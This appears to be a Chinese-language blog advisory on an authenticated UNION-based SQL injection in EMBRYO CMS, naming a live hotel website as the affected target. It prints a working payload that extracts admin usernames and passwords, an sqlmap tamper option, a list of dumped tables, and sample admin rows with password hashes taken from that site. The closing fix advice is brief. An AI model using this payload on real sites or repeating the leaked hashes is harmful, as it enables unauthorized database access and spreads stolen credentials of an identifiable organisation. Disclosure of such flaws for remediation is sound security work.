EMBRYO CMS认证SQL注入漏洞分析

本文详细分析了EMBRYO CMS系统中存在的认证SQL注入漏洞,攻击者可通过构造特定payload获取管理员凭据和敏感数据,涉及UNION注入技术和数据库表结构。

EMBRYO CMS by Pyxis Studio - 认证SQL注入漏洞分析

风险等级: 中等
本地利用:
远程利用:
CVE:
CWE: CWE-89 SQL注入漏洞

漏洞详情

在Pyxis Studio开发的EMBRYO CMS系统中发现SQL注入漏洞,该漏洞存在于www.embryohotel.com网站。经过认证的用户可利用此漏洞进行UNION-based SQL注入攻击,导致完整数据库泄露,包括管理员凭据。

漏洞证明

易受攻击参数:

1
GET /somepage.php?id=1' UNION SELECT ...

攻击载荷:

1
1' UNION SELECT 1,2,group_concat(username,0x3a,password),4 FROM admin--

篡改方式:

1
--tamper=space2comment

泄露的数据表

  • admin.csv(包含SHA1哈希密码)
  • contact.csv
  • room.csv, room_image.csv
  • room_option.csv, room_option_reletive.csv
  • slideshow.csv, slideshow_mobile.csv
  • local_area.csv

示例数据:

1
2
3
id,password,username,permission
1,e742c63f03ab602f2b38433ffc28b5145ba1332d,admin,1
2,89d36b5c82506f89c135b9794af7212cb5406dfcf,ARMERX,0

影响范围

可完全获取管理员凭据和敏感数据。

修复建议

使用参数化查询对所有用户输入进行消毒处理,避免直接拼接SQL字符串,更新EMBRYO CMS并添加适当的安全过滤器。

发现与报告

0x6ick

参考链接: https://www.0x6ick.zone.id/2025/05/panduan-menggunakan-sqlmap-live-target.html?m=1

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计